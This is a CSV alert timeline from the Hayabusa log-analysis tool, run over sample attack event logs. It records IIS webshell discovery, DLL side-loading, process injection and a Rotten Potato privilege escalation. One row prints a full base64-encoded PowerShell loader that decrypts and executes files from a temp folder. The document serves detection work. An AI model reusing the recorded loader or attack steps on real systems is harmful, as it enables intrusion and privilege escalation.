| PGUID: 365ABB72-4A01-5CE7-0000-00102DA1AC00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.182 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.182 +09:00,IEWIN7,1,low,Disc | LatMov,Net.exe Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.192 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\net1 user | Process: C:\Windows\System32\net1.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: net user | LID: 0x9cf992 | PID: 712 | PGUID: 365ABB72-4A01-5CE7-0000-0010B6A2AC00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.192 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.192 +09:00,IEWIN7,1,low,Disc | LatMov,Net.exe Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-25 00:38:21.485 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Defense Evasion - PowerShell ExecPolicy Changed | SetValue: HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell\ExecutionPolicy: Unrestricted | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3208 | PGUID: 365ABB72-0FAE-5CE8-0000-0010FE1E0800,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_powershell_execpolicy_changed_sysmon_13.evtx +2019-05-26 13:01:42.385 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe"" | Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x12962 | PID: 3836 | PGUID: 
365ABB72-0FA6-5CEA-0000-001049B50A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 13:01:42.385 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 13:01:42.545 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Evasion - Possible DLL Side Loading via jjs.exe | Image: C:\Users\IEUser\Desktop\info.rar\jli.dll | Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 3836 | PGUID: 365ABB72-0FA6-5CEA-0000-001049B50A00 | Hash: SHA1=E6F33CBE295026319CF9DB3CA665BC2BC9D978AC,MD5=CE150468126EAE5D99359DDE3197B6EA,SHA256=02B95EF7A33A87CC2B3B6FD47DB03E711045974E1ECF631D3BA9E076E1E374E9,IMPHASH=D386CCEF9C3130690E1183697F8E3ED9",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 13:01:42.966 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Evasion - Possible DLL Side Loading via jjs.exe | Image: C:\Users\IEUser\Desktop\info.rar\jli.dll | Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 3884 | PGUID: 365ABB72-0FA6-5CEA-0000-0010FEC30A00 | Hash: SHA1=E6F33CBE295026319CF9DB3CA665BC2BC9D978AC,MD5=CE150468126EAE5D99359DDE3197B6EA,SHA256=02B95EF7A33A87CC2B3B6FD47DB03E711045974E1ECF631D3BA9E076E1E374E9,IMPHASH=D386CCEF9C3130690E1183697F8E3ED9",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 13:01:42.966 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe"" | Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3884 | PGUID: 365ABB72-0FA6-5CEA-0000-0010FEC30A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 13:01:42.966 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 13:01:43.567 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | Tgt Process: C:\Windows\System32\svchost.exe | Src PID: 3884 | Src PGUID: 365ABB72-0FA6-5CEA-0000-0010FEC30A00 | Tgt PID: 3908 | Tgt PGUID: 365ABB72-0FA7-5CEA-0000-001064C60A00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 13:01:43.567 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\svchost.exe | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | 
Parent Cmd: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe"" | LID: 0x3e7 | PID: 3908 | PGUID: 365ABB72-0FA7-5CEA-0000-001064C60A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 13:01:43.567 +09:00,IEWIN7,1,critical,Evas | PrivEsc,Suspect Svchost Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_svchost_no_cli.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 13:01:43.567 +09:00,IEWIN7,1,low,Evas,Windows Processes Suspicious Parent Directory,,../hayabusa-rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 13:01:43.567 +09:00,IEWIN7,1,high,Evas,Suspicious Svchost Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 13:01:44.047 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | PID: 3836 | PGUID: 365ABB72-0FA6-5CEA-0000-001049B50A00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 13:01:44.598 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | PID: 3884 | PGUID: 365ABB72-0FA6-5CEA-0000-0010FEC30A00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx 
+2019-05-27 00:47:56.667 +09:00,IEWIN7,10,low,,Process Access,Src Process: c:\windows\system32\inetsrv\w3wp.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2744 | Src PGUID: 365ABB72-B26B-5CEA-0000-0010582A0800 | Tgt PID: 3388 | Tgt PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:56.667 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\System32\notepad.exe | Process: C:\Windows\System32\notepad.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipmb9da32d5-aa43-42fc-aeea-0cc226e10973 -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20 | LID: 0x82423 | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:56.667 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:56.727 +09:00,IEWIN7,10,low,,Process Access,Src Process: c:\windows\system32\inetsrv\w3wp.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fff | Src PID: 2744 | Src PGUID: 365ABB72-B26B-5CEA-0000-0010582A0800 | Tgt PID: 3388 | Tgt PGUID: 
365ABB72-B52C-5CEA-0000-00107A0D1100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:56.727 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:57.628 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\inetsrv\w3wp.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2744 | Src PGUID: 365ABB72-B26B-5CEA-0000-0010582A0800 | Tgt PID: 3388 | Tgt PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:57.628 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:58.830 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:49166 (IEWIN7) | Dst: 127.0.0.1:135 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:58.830 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:7777 (IEWIN7) | Dst: 127.0.0.1:49167 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: 
C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:58.830 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,../hayabusa-rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:58.830 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,../hayabusa-rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:59.871 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:7777 (IEWIN7) | Dst: 127.0.0.1:49168 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:59.871 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:49169 (IEWIN7) | Dst: 127.0.0.1:135 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:59.871 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network 
Connection,,../hayabusa-rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:59.871 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,../hayabusa-rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:48:00.732 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:7777 (IEWIN7) | Dst: 127.0.0.1:49170 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:48:00.732 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:49171 (IEWIN7) | Dst: 127.0.0.1:135 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:48:00.732 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,../hayabusa-rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:48:00.732 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network 
Connection,,../hayabusa-rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:48:00.752 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\notepad.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3388 | Src PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100 | Tgt PID: 1240 | Tgt PGUID: 365ABB72-B530-5CEA-0000-0010621A1100,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:48:00.752 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\System32\notepad.exe | LID: 0x3e7 | PID: 1240 | PGUID: 365ABB72-B530-5CEA-0000-0010621A1100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:48:01.864 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.13:49172 (IEWIN7) | Dst: 10.0.2.18:888 () | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\notepad.exe | PID: 1240 | PGUID: 365ABB72-B530-5CEA-0000-0010621A1100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:48:01.864 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,../hayabusa-rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 10:28:42.711 
+09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20 | LID: 0x82423 | PID: 2584 | PGUID: 365ABB72-3D4A-5CEB-0000-0010FA93FD00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:28:42.711 +09:00,IEWIN7,1,high,Exec,Suspicious PowerShell Parent Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:28:42.711 +09:00,IEWIN7,1,high,Persis,Shells Spawned by Web Servers,,../hayabusa-rules/sigma/process_creation/proc_creation_win_webshell_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:28:42.711 +09:00,IEWIN7,1,medium,Exec,Suspicious Execution of Powershell with Base64,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_powershell_encode.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:28:42.711 +09:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 
10:28:42.711 +09:00,IEWIN7,1,medium,Exec,Too Long PowerShell Commandlines,,../hayabusa-rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.000 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\InetSRV\appcmd.exe"" list vdir /text:physicalpath | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQ
ArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3484 | PGUID: 365ABB72-3D6C-5CEB-0000-00107257FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.110 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppools /text:name | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 2644 | PGUID: 365ABB72-3D6D-5CEB-0000-0010575CFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 
